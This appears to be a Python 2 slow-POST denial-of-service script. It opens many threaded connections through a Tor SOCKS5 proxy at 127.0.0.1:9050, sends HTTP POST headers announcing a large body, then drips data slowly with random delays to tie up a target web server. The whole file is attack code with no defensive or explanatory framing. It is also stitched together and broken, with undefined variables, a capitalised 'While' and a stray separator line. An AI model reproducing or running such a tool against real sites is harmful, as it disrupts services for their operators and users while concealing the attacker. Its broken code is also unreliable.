.::[SlowPOST]::.
import time
import random
import socks
import terminal

from threading import Thread

global stop_now
stop_now = False

class httpPost(Thread):
	def __init__(self, host, port, content):
		Thread.__init__(self)
		self.host = host
		self.port = port
		self.socks = socks.socksocket()
		self.running = True
		
	def _send_http_post(self, pause=10):
		global stop_now

		self.socks.send("POST / HTTP/1.1\r\n"
						"Host: %s\r\n"
						"User-Agent: %s\r\n"
						"Connection: keep-alive\r\n"
						"Keep-Alive: 900\r\n"
						"Content-Length: 10000\r\n"
						"Content-Type: application/x-www-form-urlencoded\r\n\r\n" % 
						(self.host, random.choice(useragents)))

		for i in range(0, 9999):
			if stop_now:
				self.running = False
				break
			p = content
			print "Posting: %s" % p
			self.socks.send(p)
			time.sleep(random.uniform(0.1, 3))
	
		self.socks.close()
		
	def run(self):
		while self.running:
			while self.running:
				try:
					 
					self.socks.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
					self.socks.connect((self.host, self.port))
					print "Connected to host..."
					break
				except Exception, e:
					if e.args[0] == 106 or e.args[0] == 60:
						break
					print "Error connecting to host..."
					continue
	
			while self.running:
				try:
					self._send_http_post()
				except Exception, e:
					if e.args[0] == 32 or e.args[0] == 104:
						print "Thread broken, restarting..."
						self.socks = socks.socksocket()
						break
					pass
_________________________________________

rthreads = []
for i in range(threads):
	t = httpPost(target, port, content)
	rthreads.append(t)
	t.start()

While len(rthreads) > 0:
	try:
		rthreads = [t.join(1) for t in rthreads if t is not None and t.isAlive()]
	except KeyboardInterrupt:
		print "\nShutting down threads...\n"
		for t in rthreads:
			stop_now = True
			t.running = False